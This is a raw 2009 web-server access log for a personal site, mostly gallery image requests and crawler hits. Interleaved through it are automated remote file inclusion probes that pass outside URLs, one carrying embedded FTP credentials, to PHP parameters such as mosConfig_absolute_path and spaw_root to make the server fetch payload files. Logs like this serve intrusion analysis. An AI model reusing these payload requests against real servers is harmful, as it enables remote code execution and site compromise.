63.206.47.131 - - [20/Nov/2009:12:04:39 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-227.jpg HTTP/1.1" 200 468270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:04:52 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture267-1024.jpg HTTP/1.0" 200 78639 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:05:05 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture143-1024.jpg HTTP/1.1" 200 121881 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.195.111.181 - - [20/Nov/2009:12:05:16 -0800] "GET /bikes/dteel/?D=D HTTP/1.0" 200 5510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:05:18 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/012-2.jpg HTTP/1.1" 200 358063 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:05:31 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-161_0.jpg HTTP/1.1" 200 480278 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:05:44 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-234.jpg HTTP/1.1" 200 341260 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:05:57 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture323-1024.jpg HTTP/1.1" 200 296527 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:06:10 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture156-1024.jpg HTTP/1.1" 200 48604 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:06:23 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-217.jpg HTTP/1.1" 200 458674 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:33 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:33 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:33 -0800] "GET /logs/access_071202.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:33 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:33 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:33 -0800] "GET /logs/access_071202.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:35 -0800] "GET /logs/access_080816.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:36 -0800] "GET /logs/access_080816.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:06:36 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-153_0.jpg HTTP/1.1" 200 366130 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:40 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:40 -0800] "GET /logs/access_071202.log//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:40 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:41 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:41 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:41 -0800] "GET /logs/access_071202.log//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:41 -0800] "GET /logs/access_080816.log//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.123.70 - - [20/Nov/2009:12:06:43 -0800] "GET /logs/access_080816.log//admin/spaw/spaw_control.class.php?spaw_root=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:12:06:46 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:12:06:46 -0800] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:12:06:46 -0800] "GET /logs/access_090130.log%20%20/inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:12:06:47 -0800] "GET /inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:12:06:47 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
114.108.177.238 - - [20/Nov/2009:12:06:47 -0800] "GET /logs/access_090130.log%20%20/inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://visual.fileave.com/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:06:49 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-148_0.jpg HTTP/1.1" 200 274811 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:07:02 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture302-1024.jpg HTTP/1.1" 200 188008 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:07:15 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/028-2.jpg HTTP/1.1" 200 497380 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
208.109.86.39 - - [20/Nov/2009:12:07:19 -0800] "GET /logs/access_080328.log%20%20/?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.109.86.39 - - [20/Nov/2009:12:07:19 -0800] "GET /logs/?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt? HTTP/1.1" 200 126786 "-" "Mozilla/5.0" "www.dmulk.com"
208.109.86.39 - - [20/Nov/2009:12:07:23 -0800] "GET /?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt? HTTP/1.1" 200 15969 "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:07:28 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/053.jpg HTTP/1.1" 200 308966 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:07:40 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture170-1024.jpg HTTP/1.1" 200 91974 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:07:53 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-015_2.jpg HTTP/1.0" 200 403137 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
139.13.44.13 - - [20/Nov/2009:12:07:55 -0800] "GET /logs/access_080613.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mail.optima-corp.com/data/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.109.86.39 - - [20/Nov/2009:12:07:57 -0800] "GET /?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt? HTTP/1.1" 200 15968 "-" "Mozilla/5.0" "www.dmulk.com"
208.109.86.39 - - [20/Nov/2009:12:07:58 -0800] "GET /logs/access_080328.log/?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.109.86.39 - - [20/Nov/2009:12:07:58 -0800] "GET /logs/?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt? HTTP/1.1" 200 126786 "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:08:06 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture341-1024.jpg HTTP/1.1" 200 60865 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:08:18 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-008.jpg HTTP/1.1" 200 371220 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:08:31 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-167.jpg HTTP/1.1" 200 178257 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:08:44 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture055-1024.jpg HTTP/1.1" 200 82710 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:08:56 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-034_1.jpg HTTP/1.1" 200 270750 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:09:09 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/008_1.jpg HTTP/1.1" 200 301940 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:09:22 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture329-1024.jpg HTTP/1.1" 200 70305 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:09:36 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-046_1.jpg HTTP/1.1" 200 226779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
81.90.50.4 - - [20/Nov/2009:12:09:37 -0800] "GET /include/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.90.50.4 - - [20/Nov/2009:12:09:37 -0800] "GET /logs//include/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.90.50.4 - - [20/Nov/2009:12:09:37 -0800] "GET /logs/access_091106.log%20%20//include/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.90.50.4 - - [20/Nov/2009:12:09:39 -0800] "GET /include/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.90.50.4 - - [20/Nov/2009:12:09:39 -0800] "GET /logs//include/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.90.50.4 - - [20/Nov/2009:12:09:39 -0800] "GET /logs/access_091106.log%20%20//include/write.php?dir=http://www.abruzzobooking.it/mambots/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:09:49 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1024.jpg HTTP/1.1" 200 269847 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:10:02 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0113.jpg HTTP/1.1" 200 312924 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:10:15 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1008.jpg HTTP/1.1" 200 332259 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:10:28 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0123.jpg HTTP/1.1" 200 552331 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:10:40 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-040_3.jpg HTTP/1.1" 200 307627 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.195.111.181 - - [20/Nov/2009:12:10:41 -0800] "GET /logs/access_090130.log HTTP/1.0" 200 2904012 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:10:53 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture210-1024.jpg HTTP/1.1" 200 65144 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:11:06 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.1" 200 448957 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:11:19 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-062_0.jpg HTTP/1.1" 200 303259 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:11:32 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture410-1024.jpg HTTP/1.1" 200 74843 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:11:45 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-035_1.jpg HTTP/1.1" 200 495111 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.195.111.181 - - [20/Nov/2009:12:11:52 -0800] "GET /logs/access_090103.log HTTP/1.0" 200 3758395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:11:57 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture105-1024.jpg HTTP/1.1" 200 59847 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:12:10 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc2/Picture262-1024.jpg HTTP/1.1" 200 53579 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:12:23 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture122-1024.jpg HTTP/1.1" 200 70028 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
200.40.86.142 - - [20/Nov/2009:12:12:30 -0800] "GET /logs/access_081230.log/galeria.php?start=0&kategoria=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.40.86.142 - - [20/Nov/2009:12:12:30 -0800] "GET /logs/access_090614.log/galeria.php?start=0&kategoria=http://www.iopentech.com//images/dvd/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:12:33 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 200 126793 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:12:35 -0800] "GET /logs/access_090713.log////?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [20/Nov/2009:12:12:35 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:12:35 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.0" 200 15964 "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:12:36 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture270-1024.jpg HTTP/1.1" 200 75488 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
69.162.109.186 - - [20/Nov/2009:12:12:39 -0800] "GET /logs/access_090828.log//skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:12:49 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/014-3.jpg HTTP/1.1" 200 525628 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
222.239.255.101 - - [20/Nov/2009:12:12:51 -0800] "GET /logs/access_080304.log/error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.255.101 - - [20/Nov/2009:12:12:51 -0800] "GET /error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
222.239.255.101 - - [20/Nov/2009:12:12:51 -0800] "GET /logs/error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:13:01 -0800] "GET /logs/access_090713.log////?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:13:01 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 200 15979 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:12:13:01 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 200 126793 "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:13:02 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-039_1.jpg HTTP/1.1" 200 475989 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
67.195.111.181 - - [20/Nov/2009:12:13:09 -0800] "GET /logs/access_090204.log HTTP/1.0" 200 2997480 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:13:15 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture076-1024.jpg HTTP/1.1" 200 49352 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:13:28 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-084_0.jpg HTTP/1.1" 200 404736 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
222.239.255.101 - - [20/Nov/2009:12:13:29 -0800] "GET /logs/access_071224.log/error.php?dir=ftp://exlixeco:abcd00121@74.86.58.178/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:13:40 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture438-1024.jpg HTTP/1.1" 200 73825 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:13:53 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/029.jpg HTTP/1.1" 200 554343 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:14:06 -0800] "GET /blog/wp-content/gallery/08-29-2009-westoc2/Picture305-1024.jpg HTTP/1.1" 200 175377 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:14:19 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/068.jpg HTTP/1.1" 200 386324 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:14:31 -0800] "GET /logs/access_090730.log%20%20//index2.php?menu=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:14:31 -0800] "GET /logs//index2.php?menu=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:14:31 -0800] "GET /logs/access_091106.log%20%20//index2.php?menu=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:12:14:31 -0800] "GET /index2.php?menu=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:14:32 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-291.jpg HTTP/1.1" 200 197121 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
63.206.47.131 - - [20/Nov/2009:12:14:45 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture367-1024.jpg HTTP/1.1" 200 66417 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/2009090216 Ubuntu/9.04 (jaunty) Firefox/3.0.14" "dmulk.com"
